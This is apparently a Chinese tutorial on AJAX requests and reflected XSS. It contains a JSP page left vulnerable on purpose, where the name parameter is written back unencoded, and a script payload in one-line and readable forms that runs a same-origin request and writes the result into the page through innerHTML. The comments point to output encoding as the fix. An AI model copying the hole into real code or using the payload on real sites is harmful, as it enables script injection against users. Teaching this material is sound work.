一、原始的ajax
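<%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8" %>
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<title>ajax</title>
</head>
<body>
<!--
Served at http://127.0.0.1:9999/ajax.jsp. Clicking the button fetches the
same-origin file ajax.json and shows its (parsed) contents inside #myDiv.
-->
<div id="myDiv"><h2>装数据的盒子</h2></div>
<button type="button" id="loadBtn">请求数据</button>
<script>
// Fetch ajax.json from the same origin and pass the parsed JSON to myCallBackFunction.
// Unlike the original, a non-200 response or a malformed body is reported on the
// console instead of being silently dropped inside the event handler.
function loadXMLDoc() {
  var xmlhttp = new XMLHttpRequest();
  xmlhttp.onreadystatechange = function () {
    if (xmlhttp.readyState !== 4) {
      return;
    }
    if (xmlhttp.status !== 200) {
      // status 0 means the request never completed (network error, blocked, aborted).
      console.error("ajax.json request failed, HTTP status " + xmlhttp.status);
      return;
    }
    var result;
    try {
      result = JSON.parse(xmlhttp.responseText);
    } catch (e) {
      // A body that is not valid JSON must not throw out of the handler.
      console.error("ajax.json is not valid JSON: " + e.message);
      return;
    }
    myCallBackFunction(result);
  };
  // A GET with no body needs no Content-Type header. Sending
  // "application/json" here only makes a cross-origin call non-simple and
  // forces a CORS preflight, so the header from the original is dropped.
  xmlhttp.open("GET", "ajax.json", true);
  xmlhttp.send();
}

// Render the fetched value as plain text. textContent, not innerHTML: whatever
// ajax.json contains is displayed literally and never parsed as markup. The
// innerHTML sink is exactly what the XSS payload in the next section abuses.
function myCallBackFunction(result) {
  document.getElementById("myDiv").textContent = result;
}

// Bind the click handler here instead of with an inline onclick="" attribute.
// (The inline <script> block itself would still need a nonce or hash under a
// strict CSP, but no inline event-handler attribute remains.)
document.getElementById("loadBtn").addEventListener("click", loadXMLDoc);
</script>
</body>
</html>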
ajax.json 的响应内容（同源的静态 JSON 文件，见下文第三节；整个文件就是一个 JSON 字符串）：
"中华人民共和国"
二、XSS 注入 ajax 代码发起请求（注意：下面的 payload 调用的是 xmlhttp.open("GET", ...)，实际发送的是 GET 请求，并非 POST）
1、存在 XSS 漏洞的页面（反射型 XSS：name 参数未经 HTML 编码就被 out.write 直接写回响应）
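<%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8" %>
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<title>XSS demo</title>
</head>
<body>
<%-- Deliberately vulnerable demo page: the ?name= query parameter is written back
     into the HTML response without encoding, so a <script> placed in it runs in
     this page's origin (reflected XSS). --%>
<form action="" method="get">
<label for="name">姓名:</label>
<input id="name" name="name" type="text">
<button type="submit">提交</button>
</form>
<%
    String name = request.getParameter("name");
    // The original tested `name != ""`, which in Java compares references, not
    // contents, and is therefore always true for a request parameter; isEmpty()
    // is the check that was intended.
    if (name != null && !name.isEmpty()) {
        // REFLECTED XSS SINK, kept on purpose so the payload in the next section
        // works. name is attacker-controlled and reaches the response body with
        // no HTML encoding. The real fix is output encoding at this point, e.g.
        // JSTL <c:out value="${param.name}"/> or an HTML-encoder call; input
        // filtering alone is not a substitute.
        out.write(name);
    }
%>
</body>
</html>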
2、payload
<!-- One-line form of the script listed under "payload原始代码" below, ready to paste
     into the name field (it ends up in the ?name= query string). Note it issues a GET,
     not a POST. Because the injected script runs in the vulnerable page's origin, its
     XMLHttpRequest to ajax.json is same-origin: the browser attaches that origin's
     cookies and the script can read the response body, then writes it into the page
     through the innerHTML sink in b(). -->
<script>function f(){var xmlhttp=new XMLHttpRequest();xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState==4&&xmlhttp.status==200){var r=JSON.parse(this.responseText);b(r)}};xmlhttp.open("GET","ajax.json",true);xmlhttp.setRequestHeader("Content-Type","application/json;charset=UTF-8");xmlhttp.send();}function b(r){document.body.innerHTML=r;}f();</script>
payload 原始（未压缩）代码，与上一行的单行 payload 完全等价：
<script>
// Same XMLHttpRequest pattern as in ajax.jsp: fetch the same-origin ajax.json
// and hand the parsed JSON to b(). Because this runs inside the vulnerable
// page's origin, the request carries that origin's cookies and the response
// is readable by the script.
function f() {
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function () {
// Only a completed (readyState 4) HTTP 200 response is used; every other
// outcome, including a JSON.parse failure, is left unhandled.
if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
var r = JSON.parse(this.responseText);
b(r)
}
};
// This is a GET (despite the section heading); the Content-Type header is
// redundant on a request that is sent without a body.
xmlhttp.open("GET", "ajax.json", true);
xmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
xmlhttp.send();
}
// Replaces the whole document body with the fetched value. innerHTML is a DOM
// XSS sink: the value is parsed as HTML rather than shown as text.
function b(r) {
document.body.innerHTML = r;
}
f();
</script>
3、后台数据文件 ajax.json（这里只是一个静态 JSON 文件，用来模拟数据源，并不是数据库）
"中华人民共和国"